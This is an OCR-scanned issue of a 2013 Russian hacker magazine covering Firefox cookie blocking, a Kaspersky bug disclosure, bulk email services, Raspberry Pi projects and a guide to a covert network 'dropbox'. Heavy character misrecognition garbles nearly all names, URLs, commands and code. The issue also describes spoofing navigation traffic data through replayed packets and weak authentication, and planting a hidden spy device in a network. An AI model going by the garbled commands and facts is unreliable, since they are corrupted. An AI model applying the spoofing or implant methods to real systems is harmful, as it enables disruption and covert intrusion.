ИИ 


Магазин подписки —— 
ЮКр://5Рор.а|с.ги УзА @ © @ ®) о — 


т2 МЕСАМЕ\/$ 


РЕКЛАМЩИКИ 
ОПОЛЧИЛИСЬНАМОЛИЕГА 


ОТМЕНАКУКИ МНОГИМ КАЖЕТСЯ ПЛОХОЙ ИДЕЕЙ 


овсем недавно Мо7Ша, аесли точнее — разработчики ЕтеТох, решила объявить 
войну сетевой рекламе. К делу приступили сразу радикально: разработчики 
заявили, что Егетох, начиная с 22-й версии, будет блокировать по умолчанию 
куки от третьих сайтов ({га-райу сооке$), если пользователь никогда на этих 
сайтах не был. Думаю, ни для кого не секрет, что куки от сторонних сайтов ис- 
пользуются с единственной целью — чтобы шпионить за пользователями. Они необходи- 
мы для составления точного профиля человека и впоследствии для показа ему более до- 
рогой таргетированной рекламы. Подобную блокировку и раньше можно было включить, 


но делать это нужно было вручную, а теперь 
ТАВ обвини- р че 
ла Мо2Ша и 
ЕоипдаНоп а. 
в том, что орга- должат свою работу как ни в чем не бывало. 
низация «создает 

серьезную угро- 

зу выживанию 
малого бизнеса 


К слову, по схожему алгоритму установки 
сооке$ уже много лет работает Затап, но его 
в США» 


аудитория слишком мала, чтобы кого-то 
волновать, а вот Егеох — дело другое. С мо- 
мента оглашения этого решения было ясно, 
что оно вызовет бурю негодования. 

Громче всех, разумеется, возмутились 
сами рекламщики. Крупнейшая в своем роде 
ассоциация «Бюро интерактивной рекламы» 
(1АВ), в которую входят 500 медийных и тех- 
нологических компаний, отвечающих за 86% 
рынка онлайн-рекламы в США, обвинила 
Мо2На РГоипаайоп в том, что организация 
«создает серьезную угрозу выживанию малого бизнеса в США} и едва ли не разрушает 
экономику. На сайте ассоциации появился целый раздел (1аб.пе1/Мо7Ша), посвященный 
тому, как именно Мо7ШМа угрожает малому бизнесу и мешает жизни обывателей. Бюро 
всерьез утверждает, что радикальный шаг Егетох серьезно ударит по малым издателям 
и приведет к банкротству тысяч малых бизнесов. 

Более того, многие эксперты предсказывают, что лишившись куки, рекламщики не- 
пременно начнут искать новые пути для слежки и могут начать использовать для иденти- 
фикации пользователей, например, цифровой отпечаток браузера. Избавиться от такого 
шпионажа будет уже совсем не просто. 

Мо7Ша тем не менее упорно придерживается принятого решения и не собирается ме- 
нять точку зрения. Разработчики заявляют, что они исходят из опыта За1ап, а также смо- 
трят на востребованность этой функции у пользователей (это легко проследить по стати- 
стике установок расширений, защищающих приватность). 


Алауз (се рго!есНоп. 


р. 


„АгеРох Не ее уме Блочузег Аа оНег5 отез\ег 
руду ап@ ргемет$ рор-чиро, зрумиаге ап уилисез. 


«Если куки заблокируют, пользователи не смогут видеть контент и объявления, которые соот- 
ветствуют их интересам. Тысячи небольших компаний, существующих за счет интернет-ре- 
кламы, будут закрыты», — уверен генеральный директор «Бюро интерактивной рекламы». 
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ОПУБЛИКОВАНА 
«ЛЫРКА» ВК 2013 


—> Еще зимой Марк Хойзе обнаружил уязвимость 

в КазрегзКу Ищете Зеситу, суть которой в некорректной 
обработке специальных пакетов 1Р\б с заголовком длин- 
нее обычного. Марк сообщил о баге в ЛК, но реакции 

не последовало. В итоге исследователь опубликовал 
всю инфу в рассылке Бидаа, приложив нужный софт. 


КРОШЕЧНЫЙ СТИЛУС 
ОТМАСОМ 


—> М/асот выпустила ВатбБоо ЭУи$ ть подходя- 
щий для всех емкостных экранов. Размер стилуса 
составляет всего 4,7 см; чтобы не потерять его, стилус 
можно прикрепить к разъему для наушников (матери- 
ал заглушки не повредит разъем). Цена аксессуара — 
15 евро, предусмотрены сменные наконечники. 


ИЗ ЪКУРЕУШЕЛ СОЗДА- 
ТЕЛЬ Р-ПРОТОКОЛА 


—> Джонатан Розенберг, один из авторов З1Р и один 
из лучших специалистов в области \о1Р, уволился 

из компании $Куре. Для Мсго5о8 и ЗКуре это опреде- 
ленно стало серьезной потерей. Новое место работы 
Розенберга уже известно — это компания С!со, где 
он также трудился ранее. 


КУРЕНИЕ 
УБИВАЕТ 
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АУРЕНИЕ УБИВАЕТ 
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Мастер созда- 
ния рассылки 
МансСИйтр 


ХАКЕР 05 /172/ 2013 


КОЛОНКА 
СТЕПЫ 
ИЛЬИНА 


ПРО ТО, КАК Я 
СПАМ РАССЫЛАЛ 


Поясню. Речь, конечно, идет не о спаме как таковом. А всего лишь 
о рассылке безобидных писем относительно большому количе- 
ству людей (несколько тысяч человек). Друзья, которые обрати- 
лись за помощью, делали такую рассылку обескураживающим 
способом — просто вставляли огромные списки адресов в поле 
То: своего Ощюок`а (надеюсь, что это было поле Всс:). Понятно, 
что эффективности от такой рассылки было немного, хотя ника- 
кой возможности замерить процент доставки и тем более про- 
чтения или попадания в спам не было. Нужно было помочь. 


СПОСОБ, КОТОРЫЙ НЕ РАБОТАЕТ 

Если бы надо было решить эту задачу десять лет 
назад, то я бы не задумываясь набросал скриптик 
на Рег’е, который через зепата! методично рас- 
сылал письма в несколько потоков. Но этот способ 
не многим лучше, чем использование Оифоок’а 
(кроме возможности все автоматизировать). 
Но первое, что я сделал сегодня, — решил поис- 
кать уже готовые сервисы, которые сфокусирова- 
ны на грамотной реализации массовых рассылок. 
Выбор пал на МайСИитр (тайспитр.соп?). 

Десяти минут работы с сервисом хватило по- 
нять, что создатели сделали все, чтобы рассылку 
сделать было просто и она реально работала. Если 
подписчиков не больше двух тысяч, а писем нужно 
рассылать не более 12 тысяч в месяц (столько до- 
пускается в рамках бесплатного тарифного плана), 
то ничего другого, пожалуй, и не нужно. 


ТРИ ШАГА В МАП.СН1МР 

Весь процесс состоит из трех этапов: 

1. Сначала формируется лист рассылки. 
При этом данные можно интегрировать из раз- 
ных источников. Например, Ехсе!- или С\5З- 
файла, выбрав из него только те поля, которые 
нужны. База не ограничивается парой «имя — 
е-та!» — можно создавать сколько угодно 
полей и потом подставлять эти данные в сге- 


нерированных письмах. Здесь же можно со- 
брать форму для быстрой подписки — готовый 
НТМЁ-код можно сразу поставить на свой сайт. 

2. Далее нужно подготовить шаблон для рас- 
сылки. Ты видел эти замечательные и классно 
оформленные письма от западных стартапов? 
МайСИтр предлагает десятки самых разных 
шаблонов, на базе которых можно сделать 
темплейт письма. Встроенный \ММУММС- 
редактор подсказывает, как сделатьтак, чтобы 
все отлично выглядело как на десктопных, так 
и на мобильных клиентах. 

3. На основе шаблона и подготовленного списка 
письма создается кампания (собственно сама 
рекламная рассылка). Настраиваешь, как бу- 
дет выглядеть письмо в НТМЁ и рат-ехге (в 
тех клиентах, где отображение НТМЕ запре- 
щено), указываешь е-та! отправителя (пред- 
варительно нужно подтвердить, что утебя есть 
е-та! в указанном домене) — и можно делать 
рассылку. 


ДОПОЛНИТЕЛЬНЫЕ ФИШКИ 
За простой схемой использования скрыта нема- 
ленькая работа. 

Чтобы твои письма не валились сразу в спам, 
а воспринимались почтовыми серверами как ле- 
гитимные письма, используются ОКМ, ОБотат 


Кеу$, Зепаетро, ЭРЕ — различные механизмы ау- 
тентификации письма. Ты можешь даже не знать, 
что это такое и тем более как настроить на почто- 
вом сервере, но МайСИитр их будет использовать 
по умолчанию. 

Сделать рассылку с определенной долей успе- 
ха можно и просто из почтового клиента. Но ведь 
хочется управлять кампанией: знать, сколько пи- 
сем было доставлено или, еще лучше, сколько лю- 
дей их прочитали. Сервис умеет считать послед- 
ний параметр, используя старый добрый прием. 
В тело письма вставляется невидимая картинка, 
которая расположена на сервере и имеет имя 
файла, уникальное для этого получателя. Если 
к картинке происходит обращение (а это может 
произойти только из е-тай-клиента), значит, пись- 
мо было прочитано. 

Через несколько рассылок, когда ты освоишься 
с основным функционалом, откроются дополни- 
тельные фишки. Например, возможность рассыл- 
ки с А/В-тестированием. Скажем, разделить всех 
получателей на две группы и разослать им одно 
и то же сообщение, но с разными изменениями 
(например, визуальными). И оценить, какой из ва- 
риантов больше привлекает внимание и более эф- 
фективен. 


АМАСОМ $Е$ 
Использовать готовый сервис не всегда удобно: 
даже при наличии АР! МайСпитр сильно сковыва- 
етв некоторых моментах. И ктому же при больших 
объемах начинает кусаться в цене. Альтернативой 
стал Атагоп ЗЕ$ — облачный сервис, специально 
созданный для рассылки писем. Тут есть важный 
момент. Если МайСПитр разрабатывался для обыч- 
ных людей, то Ататоп 5Е$ — для программистов. 
Тридцать минут для понимания что к чему 
и простого кодинга (на СННи’е есть масса заго- 
товок) — и скрипт для эффективной рассылки был 
готов. Если не превышать порог в две тысячи пи- 
сем в день, то использовать его можно бесплатно! 
Правда, нужно обязательно стараться, чтобы коли- 
чество жалоб на твои рассылки было минималь- 
ным: Атагоп за этим следит особенно трепетно. == 
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ЧТО ЭТОТАКОЕ 

Многие автолюбители полагаются на инфор- 
мацию о пробках с веб-сервисов вроде Сооце 
Мамюаноп, \М/ате или Яндекс.Пробки. Если води- 
тель видит впереди затор, то выберет объездную 
дорогу. 

На конференции Васк На{ Еигоре 2013 в Ам- 
стердаме выступил немецкий хакер Тобиас Еске 
(Тобаз уезке) с докладом о спуфинге трафика 
навигационных сервисов (5И.1у/ХВУЕа!). Под- 
дельные показания со смартфонов автолюбите- 
лей позволяют обмануть навигационный сервис 
и создать видимость пробки там, где ее нет. И на- 
оборот, можно «спрятать» пробку от навигацион- 
ной системы. Идея, правда, не новая: Дима Ча- 
стухин из О$ес уже демонстрировал этот фокус 
на Яндекс.Картах больше года назад. 


ЗАЧЕМ ЭТО НУЖНО 

Например, для очистки маршрута от лишних 
автомобилей. Создаем фальшивые пробки, на- 
правляя других автомобилистов по объездным 
дорогам, — и расчищаем себе путь. 

Обратная задача — спровоцировать насто- 
ящий затор в конкретном месте — требует ге- 
нерации фиктивных заторов на альтернативных 
маршрутах, чтобы направить автомобилистов 
в нужную нам точку. Эдакая ОО)оЗ$-атака, только 
вместо пакетов мы направляем, куда надо, авто- 
мобильный трафик. 

При продуманном масштабном применении 
подобной техники можно парализовать движе- 
ние в целом городе, уверен Тобиас Еске. 


КАК ЭТО РАБОТАЕТ 
Информация о пробках собирается со смарт- 
фонов самих автолюбителей. Смартфоны 


Апаго в обычном фоновом режиме отправляют 
в Сооде свои координаты каждые 10-30 минут. 
При отключенном СР$ отправляются МАС- 
адреса и идентификаторы $ ближайших \\/- 
Е-хотспотов. Точные координаты всех хотспотов 
есть в базе данных Соод(е. 

Тобиас Еске изучил, какие протоколы ис- 
пользуются для сбора данных со смартфонов 
в сервисах Соое МамдаНоп и \ММате и насколь- 
ко они уязвимы для спуфинга. Информация 
передается по защищенному соединению (ТЕ). 
Для изучения и модификации отправляемых 
пакетов Еске использовал прокси тИтргоху 
(тИгпргоху.ога). Программа получает запросы, 
переправляет их в Сооде, а сама генерирует 
свой 551-сертификат для смартфона. Програм- 
ма способна изменять пакеты на лету с помощью 
РУпоп-скриптов. 

Хакер установил сертификат на своем 
Апагоа-устройстве, подключился к бооде через 
прокси пИгтргоху — и сумел проанализировать, 
в каком виде сервису отдается информация. 
Как выяснилось, аутентификация устройств 
осуществляется всего лишь по восьмибайто- 
вой сооке, которая генерируется случайным 
образом при первом обращении к сервису, по- 
сле чего остается неизменной. Больше Сооде 
не делает никаких проверок. Если с Апагою- 
устройства отправить в боое запрос со случай- 
ной восьмибайтовой сооКе и реальными МАС 


и $510 от\М/-Е!-точек какого-то района, то сервис 
воспримет эту информацию как аутентичную 
и учтет при анализе трафика на дорогах. Таким 
образом, появляется возможность умышленно 
исказить данные, по которым вычисляется ин- 
формация о пробках. 

Полезная нагрузка в пакетах к Соод!е кодиру- 
ется по протоколу Рго{осо! ВиНег$ и содержит не- 
сколько обязательных и необязательных полей: 
метка времени, долгота и широта, информация 
о МАСи $510 от \М-Е!-точек и прочее (рис. 1 и 2). 

Проще всего сгенерировать подходящие 
поддельные пакеты, если самому проехать 
по маршруту и записать трафик, передаваемый 
серверу. После этого можно модифицировать 
куки, идентификатор платформы и метки време- 
ни — и отправить это в Сбооде в рамках поддель- 
ной сессии. Как уже было отмечено выше, прок- 
си-сервер тИтргоху способен модифицировать 
пакеты по 551, по шаблонам. 

Для усиления эффекта действие нужно по- 
вторять через небольшие интервалы, меняя 
куки, 10 платформы и метку времени. Так мы эму- 
лируем поток машин. 

Тобиас Еске доказал работоспособность кон- 
цепции в сервисе Соод!е Мамдайопт. Он исполь- 
зовал описанный метод и создал искусственную 
пробку в квартале Баренфельд в западной части 
города Гамбурга (рис. 3). 

Теоретически атака проходит, даже если неез- 
дить предварительно по маршруту. В этом случае, 
получается, мы можем создать затор на любой 
дороге мира. Проведем эксперимент? 2= 


теззазе [але Му Рис. 2. Струк- 

| гецигед Пхе432 [21 = 1; тура пакета, 
гецийге Йхе432 [пе = 2; ЕЕ: С ОИИНЕЕНИНИЕЕСИВ ое сс о. ВИ ты отправляемого в 

иеззаде ГосаопРАоНЕМВ мене Е Я бод сАпао- 
орНопа! Га] п2М$е Гале = 1; байта е2йр или нет устройства. Про- 
орНопа! 11132 Ассигасу = 3; | - не и Е . 
орНопа! 11164 Типезматр = 6; | р — о - реймворке 
орфова! 1132 ГоеТуре = 8 эт [оо [ао |4 | “влослаР |0 [00 [ео | ел | её [ез [о + 7ы (Мое Зепыто 
орНопа! 11132 АНииде = 10; ЫУ——— щи АррИсаНоп 
орйопа! Вхед32 Зрее4 = 16. блок 6 УВ! сервиса версия длина сообщения полезная Егатем/огК) 
орНопа! Боос! РизоеЧ = 17; а нагрузка 

тебзаре СеЙМуе - | 
гедий"е@ 11132 Гас = 1; ыы Я Рис. 3. Результат 
гедийгей 11132 Сеша = 2; ыы И. эксперимента 
орйопа! 11132 Мис = 3; Тобиаса Еске 
орйопа! 11132 Мсс = 4; поподделке 
орНопа! 11132 К 351 = 5; трафика в боод!е 
орНопа! 11132 КафюТуре = 10; МамодаНоп. 

теззаре ИУЛОеусеМ5я Скриншотперед 
гечште@ 5112 МАС = 1; спуфингом (слева) 
орНопа! шп? $$ = 2; ипосле успешной 
орНопа! 11132 К $51 = 4; атаки (справа) 


Рис. 1. Шаблон полезной нагрузки для 
запросов и ответов по протоколу Рготосо! 
ВиНег$ 
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КАК ТАК ПОЛУЧИЛОСЬ? 


Прошел год с начала продаж Вазрбегту РЕ, и за эти две- 
надцать месяцев «компьютер за 35 долларов» превра- 
тился в самый интересный гаджет последних лет. Все 
это время мы наблюдали за малюткой и делились с то- 
бой новостями и НОМ/ТО. Мы делали кофеварку, соби- 
рали медиацентр, но всегда понимали, что этого мало. 
Давай начнем с самого начала. 


«ДАКОМУЭТО НУЖНО?» 
— возможно, спросишь ты и будешь в чем-то 
прав. Дело в том, что ВР! — крайне слабая же- 
лезка, и в ней нет какого-то ноу-хау. К приме- 
ру, чипсет малютки, Вгоаасот ВСМ2835, во- 
обще был разработан для ТВ-приставки Воки 
2 и рекордов скорости не бьет совершенно 
точно. В комплекте нет ничего, даже блока 
питания или карты памяти. Вся периферия 
работает через один-единственный Ч$В- 
контроллер, и питания на портах не всегда 
хватает даже для жесткого диска. Но оказа- 
лось, что это вообще неважно. 

Семь лет назад команда преподавателей 
из Кембриджа под руководством Эбена Ап- 
тона обратила внимание на то, что уровень 


в три раза дешевле Аррее 1. И хотя те компью- 
теры были слабыми, не имели красивого со- 
фта и требовали постоянного ковыряния, они 
породили целое поколение компьютерщиков. 
Что мешает сделать то же самое сейчас? 
Оказывается, ничего. ВазрЬеггу Р! повто- 
ряет эту формулу дословно. Простой ком- 
пьютер, который может использовать любую 
периферию, что уже валяется у тебя дома, — 
5О-карточки, зарядник от телефона, флешки 
и так далее. И надо сказать, что эта формула 
«выстрелила» на славу. Разработчики на- 
деялись продать тысячу устройств, а в итоге 
первая партия была распродана за первый 
же час после объявления предзаказа. Сейчас 
количество проданных устройств достигает 


ВНИМАНИЕ: КОНКУРС! 


Утебя есть шанс получить один из десяти 
ВазрЬеггу РЕ (версия В с 512 Мб оперативки) 
откомпании «Терраэлектроника». Все, что тебе 
нужно для этого сделать, — прислать нам 

на газрбеггу.р'@геа!.хакер.ги до 15 мая описание 
самого интересного проекта на базе Вазрбегту 
Р1. Какие требования мы предъявляем к твоему 
концепту: 


р 


Объясни, в чем идея. Может быть, ты сдела- 
ешь с помощью ВР! более дешевую реали- 
зацию какого-нибудь девайса. А возможно, 
такого девайса вообще не существует 

И «малинка» позволит быстро создать его 
прототип. 


студентов, поступающих на технические дис- 1 200 000. В России продано около 3 тысяч 2. Расскажи, как ты будешь это делать и какой 
циплины, начал падать. Пытаясь понять, по- устройств. будешь использовать софт, аксессуары. Нам 
чему так происходит, он задал себе простой Единственное, в чем просчитались созда- важно понимать: то, что ты хочешь сделать, 
вопрос: а что изменилось со времен, когда тели, — Разрбеггу оказался интересен взрос- на самом деле возможно. 

я был в их возрасте? И предположил — дело лым. Настолько интересен, что с момента 3. Поставь в тему письма «Проект на Разрбеггу 


в том, что преподаватели в юности пользова- 
лись куда более простыми домашними ком- 
пьютерами вроде 7Х Зрестит и Соттоаоге 
64. ВВС Мгсго, популярный в Британии, на- 
пример, стоил 235 фунтов, что было почти 


запуска в феврале устройства еще минимум 
полгода покупались почти исключительно 
гиками. И вот настала пора разобраться. Мы 
решили собрать все самое интересное, про- 
изошедшее за первый год с Вазрбету Р!'. 22 


РЬ», чтобы оно не затерялось, и укажи до- 
полнительные контактные данные. Будет 
обидно, если ты сделаешь очень крутой 
девайс, а мы не сможем с тобой связаться 
или письмо окажется в спаме. 


Подарки предоставляет «Терраэлектроника», 

официальный партнер производителя «малин- СечрБоага Р!Расе РУМем МИР! 

ки» Рагпе! / Нетегт 14 в России. На их сайте специальная О@Р!О- модуль для установки подключение \М-Е!-донгл 

(1. пр/ВР! ги) ты можешь купить Вазрбету Р! карта расширения на Назрбеггу Р! Вазрбеигту Р! для подключения 
прямо со склада с доставкой по России. Кроме для подключения и обеспечения со- к \СА-монитору к Вазрбегту Р! 


сложных физических через НОМ!-выход 


устройств 


того, они продают аксессуары, протестиро- 
ванные производителем на совместимость 
С «малинкой». 


единения с лампами, 
двигателями 
и сенсорами 
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Но 


САМЫЕ 
ИНТЕРЕСНЫЕ 
ПРОЕКТЫ, 
СВЯЗАННЫЕ 

С ВАЗРВЕННУ Р! 


Можно сколько угодно гово- 
рить о том, что ВР! — слабая 
железка, что все уже было при- 
думано тысячу раз или что во- 
обще это происки Вгоаасот / 
маркетоидный заговор / любая 
другая паранойя. Все это раз- 
бивается одним аргументом: 
ни одному подобному гаджету 
не удалось породить такую 
экосистему. Если звезды за- 
жигают — значит, это кому- 
нибудь нужно. 
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ДИСТРИБУТИВЫ 


агсНпих 


мимлм.газр1ап.ога 

Официальная ОС для НР! которую используют сами создатели малютки, поя- 
вилась довольно спонтанно. Бефап, заточенный под РазрЬегту Р!, был сделан 
двумя сторонними контрибьюторами. Первым был Майк Томпсон, который 
только что продал за 45 миллионов долларов свой стартап Алюта (поисковый 
движок для сайтов). Вторым — Питер Грин, британский аспирант. Они нашли 
друг друга на официальном форуме РВазрБегту Рги занялисьтем, что было ин- 
тересно им обоим, — сделали версию ОБешап, которая поддерживала очень 
мощный математический сопроцессор ВР!. До того стандартной ОС была 
Еедога, над которой работали сотрудники Вед На\ф, но из-за отсутствия под- 
держки сопроцессора она была значительно медленнее. Остальное, как го- 
ворится, уже история. Большинство проектов для Назрбеггу Р! делается 
на базе ВазрЫап, и в репозитории доступно множество специфического со- 
фта, о котором речь пойдет дальше. 


агси!пихаит.ога 
Честно говоря, АТАВМ (так часто сокращают его разработчики), по моим 


ощущениям работает не так стабильно, как Вешап. Но без сомнения, сильная 
сторона этой ОС в том, что в рамках одного проекта делается операционка 
для нескольких десятков разных ААМ-систем: от Вазрбеггу РГ до Затзипод 
Спготероок. Поэтому, если ты работаешь с кучей таких устройств, тебе, оче- 
видно, будет удобнее, если на всех них будет стоять одна ита же система. Од- 
нако количество софта и его стабильность по сравнению с ВазрЫап заметно 
проигрывает, да и сообщество именно владельцев ВРГобъективно меныше. 


Пр$://едогаргоес{.огалмки/Вазроеггу_Р! 

Это единственный мейнстримовый дистрибутив, который официально под- 
держивает малютку (в случае с Вазрыап и АЕАВМ речь все-таки идет о не- 
зависимых портах). Поскольку в Еедога всегда были очень тесные отноше- 
ния с апстримом почти всего Мпих (видишь, я удержался и не пошутил про 
тестовый полигон Вед На+... а, уже неважно), то для разработчиков софта 
на Вазрбеиггу это может быть интересно. Но какого-то гигантского преимуще- 
ства у этого дистрибутивая лично не вижу. Да простят меня воины ВЕМ иуит. 


(1/5 мрроюьм-тя 
ЧТО ТВОБИТСЯ 
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ЭКЗОТИЧЕСКИЕ Е. 


ИРЕТРО ОС 


В1$С 0$ ДЛЯ ВР! 
мимими.газрбеггур!.ога/Чо\мипюа4$ 
В$С О$ для ВР!Гпоявилась, очевид- 
но, из желания продолжить идею 
исторического наследия британ- 
ской малютки. Эта операционная 
система была разработана ком- 
панией Асот Сотрщег$ — той же 
самой, что сделала ВВС Мгсго. По- 
играть с операционкой из прошлого 
века будет любопытно не только 
законченным хипстерам, но и тем, 
кого интересует устройство ОС (по- 
скольку код доступен). Мы еще 

не успели поковыряться с этой шту- 
кой, но точно сделаем это в статье 
для рубрики «Сцена». 


} 


Хх 
4 


ъ а 


э\\ъсо5 


М$-005$ 

грих8б.раскааКо. сот/"Боа. Пи! 
Естественно, на Вазрегту Р!не об- 
ходится без старого доброго М$ 
00$ — им и занимается создатель 
грих86. Правда, поставить Во$Вох — 
элементарно, и смысла брать 

для этого ВР!нет, но это может быть 
интересно, если ты хочешь занять- 
ся моддингом и превратить малин- 
ку в стилизованный ретрокомп. 


РЕАМЭ 

Би.|у/о!епаа-р! 

Порт Р!ап 9 для Вазрбегту Р!— 
работа чуть ли не одного человека. 
Тем не менее это неплохой способ 
попробовать операционку, которая 
считается «большим УМХ, чем сам 
УМХ» (потому что делали ее те 

же люди). Например, повозиться 

с текстовым редактором асте 

и оконным менеджером по — если 
ты когда-нибудь пробовал окон- 
ный менеджер мили и некоторые 
другие поделки проекта ЗисКе$5 
(зиске$$.ога), ты знаешь, о чем 
идет речь. 


Если поставить на одну карточку РазрЬеггу несколько ОС, 
то возникнет вопрос: как между ними переключаться, 
если нет СРОВ или другого нормального загрузчика? Эту 
проблему решает ВегтуВос\. Казалось бы, зачем так за- 
морачиваться, если карточка стоит дешево и надежность 
при использовании нескольких ОС на ней становится 
сильно ниже? Например, это имеет смысл в мульти- 
медиацентре: при загрузке ты можешь переключаться 
между РазрЫтс (чтобы посмотреть кино) и обычным 
ВазрЫап с установленным Етиайоп Зтайоп (чтобы по- 
играть). ВеггуВоо{ поддерживает пресловутый НОМ! СЕС, 
поэтому переключаться можно прямо с пульта. == 


МАЕТО 
1008 


ИНТЕРНЕТ-РАДИО 
«Умные» колонки с доступом к сервисам потокового вещания 
даже в Штатах стоят от трех сотен долларов. А у тебя наверняка 
уже валяются какие-нибудь динамики — так почему бы не сде- 
лать интернет-радио? С ВР/возможностей для этого — море. 
Самый простой способ — поставить р!апобаг (консольный 
клиент для Рапаога), который доступен прямо в репозитории 
ВазрЫап. Поскольку Рапаога в России не работает, утилита 
не сможет запуститься сразу — ей нужно будет подсунуть пра- 


вильный конфиг, в который ты впишешь свой логин/пароль и адрес прокси с аме- 
риканским ПР. Это будет работать бесплатно. Другой вариант — Р! МизсВох. Это 
ВазрЫап с предустановленным пакетом тор!ау, который берет поток Эро Шу 
и транслирует его на любой клиент МРР (это может быть хоть смартфон). Увы, тут 
понадобится платный аккаунт Эро у. 

Кстати, должен предупредить — у НРазрбегту есть проблемы с выводом 
на 3,5-миллиметровый джек. В некоторых случаях возникают шумы и щелчки в на- 
чале и конце аудиопотока — то есть, например, при переключении песен. Придет- 
ся поковыряться или купить УЗВ-аудиокарту. Например, в обычном плеере можно 
включить режим дар!е$$, чтобы переходов между песнями просто не было. 


--2 МОНО 


1х5 


1—1 


МЕДИАЦЕНТР 

Не буду повторяться — все очень подробно было описано в ста- 
тье «Говорит и показывает Вазрбеггу Р», электронную версию 
которой ты можешь найти на диске. Существует три основных 
дистрибутива на основе ХВМС: Вазрбтс, ХЫап и ОрепЕЁТЕС. Так- 
же совсем недавно появился Ва$Р!ех (газр!ех.сот), построенный 
на основе медиацентра Р!ех (по сути, более вылизанная версия 
ХВМС). Но этот проект еще совсем сырой, поэтому пока лучше 
все-таки пользоваться Вазрытс. 


ИГРОВАЯ КОНСОЛЬ 

Эмуляция почти любой консоли возможна с помощью платфор- 
мы ВегоАгсй. Это единая прослойка для множества эмулято- 
ров, имеющая неплохой гуй в виде Етиайоп ЗаНоп. Поддерж- 
ка Вазрбеггу, что самое важное, есть — нужно скачать скрипт 
с официального репозитория  (ПИр$://а{пи.сот/Тпетаег 
ВеноАгсй), который сам все поставит. Лучший геймпад на све- 
те — это геймпад от Хрох 360. Завести под Вазрбеггу проще всего 
проводную версию, в ВазрЫап есть собранная версия драйвера. 


Для беспроводной придется искать специальный адаптер (если только ты не ухи- 


трился найти М/пао\5-версию геймпада, которая встречается довольно редко). Ну 
и, пользуясь случаем, хочу напомнить про существование версии культовой игры 
Мтесгай для ВазрБеггу РЕ (р. пшесгай.пе?). Отличие этой версии в том, что взаи- 
модействие с реальным миром возможно на Выру. То есть мало того что ты полу- 
чаешь игровой мир — песочницу, так и делать в нем ты можешь почти что угодно. 


ХАКБОКС 

РмтР!(р\м/пр!. сот) — готовый набор для использования РазрЬе!гту 
в проектах, связанных с инфобезопасностью. В набор входит 
более двух сотен «правильных тулз», позволяющих сделать 
с машинкой почти все, что угодно. Поддержка Разрбегту Р! так- 
же появилась в хорошо знакомом ВаскКТгаск Мпих (ныне — Кай), 
но на момент написания заметки работало все с заметным скри- 
пом. Подробнее о настройке Р\мпР! читай в статье «Маленький 
британский шпион». 


МАЗИ ДОМАШНЕЕ ОБЛАКО 

Для того чтобы попробовать РЕгееМА$ на Разрбеггу РР, можешь 
глянуть дистрибутив ЗацеетеР!и д. Это тоже БеыШап, тоже с под- 
держкой математического сопроцессора, но включает в себя 
по умолчанию кучу тулз для МАЗ и стриминга медиа. В тысяч- 
ный раз повторяю, что МАЗ из Вазрбеггу получится никакой, но, 
возможно, тебе захочется побаловаться с ЗацеетеР ид (млм. 
зацеетероа.ец), прежде чем купить специализированную же- 
лезку (например, Родор!ид, см. последнюю статью). 
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МАЛЕНЬКИЙ, 
БРИТАНСКИИ 


шин 


ДЕЛАЕМ 
ЗАКЛАДКУ 
ИЗ ВАЗРВЕННВУ Р! 


Идея дропбокса проста: если миниа- 
тюрный компьютер снабдить батаре- 
ей и 3З@-модемом, то можно получить 
шпионскую коробочку, которая неза- 
метно подключается к исследуемой 
сети и передает собранные данные. 
Этот концепт вполне реализуем 

на Вазрбеиту Р!. 


абегая вперед, скажу: из-за высокого энергопотре- 
бления наш дропбокс хорошо подойдет скорее для 
работы в собственных сетях. Для чужих ему просто 
не хватит батареи, но концепт все равно выглядит 
заманчиво. Все это мы будем делать на базе дистрибутива 
Ру/пР!. В нем мы настроим работу с модемом, научимся прини- 
мать команды по 5М$ и отсылать логи в Еуетсое. В моем рас- 
поряжении был 3ЗС-модем Ниаме! Е1550 («Мегафон Е! 550»). 


ПЕРЕКЛЮЧЕНИЕВРЕЖИМ МОДЕМА 

Многие 3С-модемы при подключении выглядят как диск 
для того, чтобы предварительно установить необходимые 
драйверы, и требуют переключения в режим модема. Модем 


Е1550 — из их числа и изначально недоступен как терминал: 


# 1$ /9еу/еу9у$в* 
1$: саппоЕ ассез$$ /4ему/уЦ$В11*: 
№о зисй Я1е ог а1гесфогу 


Посмотрим на описание ЦЗВ-устройств: 


# 15$и$6 

Виз 001 Беу1се 009: ТО 

Ниамет ТесИпо1051е$ Со., 114. Е1552/Е1800/Е1?З 
(НРА тодет) 


Александр Лыкошин 


Зато он виден как диск: 


# 1$ -1 /аеу/а1$К/бу-1а/ 
и$6-НУАМЕТ_ММС_5фогаде-0:0 -> ../../5ъаа 
и$6-НУАШЕТ_Ма$$_5%огазе-0:0 -> ../../5г@ 


Для того чтобы переключить его в режим модема, потребу- 
ется установить дополнительную программу и перезагрузиться 
(другим модемам могут понадобиться другие настройки): 


# арт-веф ирдафе && арт-веф 1п$а11 избБ-тодези1 си 
# гебоо* 


Посмотрим на описание УЗВ-устройства еще раз: 


# 15и$6 

Виз 001 ОБеузсе 0190: ТО 1 

Ниаме1 Тесйпо1о81е$ Со., 14а. Е220 Н5ОРА Мо4ет / 
Е230/Е?270/ЕЗ70 Н5$БРА/Н$УРА Мо4ет 


Видно, что у модема изменился Вемсе 0 (выделено крас- 
ным цветом), и теперь нам стали доступны его порты: 


# 15 /аем/Еуу$в* 
/аем/&уЦ$В0 /4еу/+уц$В1 


ЗАК $И ОМТЗКЕЕРЕВ 

Первая программа, которая нам понадобится для настрой- 
ки З3ЗОС-модема, — Фак53З@, сценарий для установления 
З@а-соединения. Домашняя страница проекта зак!$-За.ога 
уже некоторое время недоступна, но копия скрипта есть 
на зоигсеТогде. Загрузим ее, разархивируем и разрешим вы- 
полнение: 


# иКка1г -/3 && с4 -/3в 
# мреЕ Пр: / /домп1оаа$ .зоигсеРогде.пее/рго]есе/«= 
\1т-п4п0/5ак1$35.Фаг.57 -О $аК1$35.фаг.57 


# Таг -хи\уР заК1$35.%аг.57 
# сито +х зак1$3в 
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АВТОНОМНОЕ 
ПИТАНИЕ 


Вазрбеггу Р/с подклю- 
ченными и активными 
адаптерами \\-Е! 
(0-НпкОМ/А-140 В2) изб 
(Ниаме! Е!1550) потребля- 
етпорядка 700—800 мА. 
Емкость доступных 
на сегодняшний день 
достаточно компактных 
внешних литиевых акку- 
муляторов достигает 20 
ампер-часов, что может 
обеспечить срокавто- 
номной работы до суток. 
Если рассматривать 
ВР! в качестве просто 
многофункционального 
устройства, это очень и 
очень неплохо; однако 
ее скрытая установка на 
более длительное время 
потребует подключения 
